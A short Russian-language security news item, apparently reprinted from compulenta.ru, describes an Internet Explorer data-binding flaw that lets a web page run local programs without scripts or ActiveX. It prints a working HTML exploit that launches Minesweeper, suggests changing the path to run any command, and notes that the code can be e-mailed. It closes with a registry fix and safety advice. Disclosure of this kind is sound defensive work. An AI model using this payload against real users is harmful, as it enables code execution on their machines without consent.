Израильские специалисты по компьютерной безопасности обнаружили весьма серьезную уязвимость в браузере IE. С её помощью на удаленной машине можно запустить любую программу, причем без использования скриптов и ActiveX.
Задействовать её можно с помощью следующего HTML-кода:
<blockquote><font size="1" face="MS Sans Serif, Verdana, Helvetica, sans-serif">code:</font><hr><pre>
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span><xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/winmine.exe"></object>
]]>
</exploit>
</security>
</xml>
</pre><hr></blockquote>
Данный код можно скопировать в блокнот и сохранить в файл с расширением .html. Если этот файл будет открыт в IE, автоматически запустится игра САПЁР но запустить можно любую программу и команду что делает эту уязвимость просто ужасной. Если внести в код маленькие изменения и внедрить переменную в пути исполняемой программы а не использовать абсолютные пути [c:/windows/system32/winmine.exe] на исполнение команд, то запуск программ обеспечен на любых компьютерах с операционными системами Windows. Уязвимость присутствует во всех версиях IE, так как используется функция "data binding", введенная еще в IE4.
Посмотреть на действие этого кода можно http://acid.land.am/koshmar.html.
От редакции: предполагается что у вас виндавоз находится в каталоге c:\windows
Просто без вашего разрешения запустится игра "САПЁР"
AVP ругается на этот код и говорит что есть подозрение на Exploit.CodeBaseExec но в данном случае это не вирус! NAV и другие антивирусы вообще не реагируют на этот код
Для запрета исполнения данного кода необходимо внести маленькие изменения в системный регистр, находим следующую ветку в регистре:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
и меняем значение для "1004" с dword:00000000 на dword:00000003
Для того чтобы внесённые изменения вступили в силу перезагрузите компьютер. И все.
На всякий случай не открывайте подобные демонстрационные странички в Интернете или в сомнительных местах и не выключайте AVP Monitor не известно что могут разместить на подобных страницах не порядочные люди.... Самое страшное это то что данный код можно пересылать по электронной почте в HTML коде
::::::::::: По материалам сайта
http://www.compulenta.ru